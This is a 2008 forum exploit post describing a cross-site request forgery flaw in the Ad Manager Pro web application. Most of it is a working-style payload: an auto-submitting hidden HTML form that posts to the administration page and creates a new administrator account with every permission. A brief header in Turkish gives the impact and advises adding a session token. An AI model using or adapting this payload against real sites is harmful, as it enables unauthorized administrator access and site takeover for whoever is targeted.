Ad Manager Pro ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Ad Manager Pro ~ XSRF Vuln.

Madde
	Author : Bug Researchers
	Date : 04.11.2008 16:06:36
	# Ad Manager Pro ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : Ad Manager Pro # Vulnerable Type : Cross Site Request Forgery # Infection : Yönetici ve user sifreleri uzaktan degisilebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : Bug Researchers ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <b0dy onLoad=Submit();> <script>function Submit[]{document.BizaRRo.submit();}</script> <Form Action=http://www.site.com/[PATCH]/administration/admins.php method=post name=BizaRRo > <input type=hidden name=action value=admin_created> <input type=hidden name=username value=bizobizo > <input type=hidden name=password value=bizobizo> <input type=hidden name=name value=bizobizo> <input type=hidden name=email value=bizobizo@bizo.com> <input type=hidden name=rights[] value=advertisers> <input type=hidden name=rights[] value=packages> <input type=hidden name=rights[] value=publishers> <input type=hidden name=rights[] value=ads> <input type=hidden name=rights[] value=def_ads> <input type=hidden name=rights[] value=black_zones> <input type=hidden name=rights[] value=backup> <input type=hidden name=rights[] value=email_u> <input type=hidden name=rights[] value=reset> <input type=hidden name=rights[] value=tmpl_msg> <input type=hidden name=rights[] value=admins> <input type=hidden name=rights[] value=config> <input type=submit value=create name=B1> < -- bug code end of -- >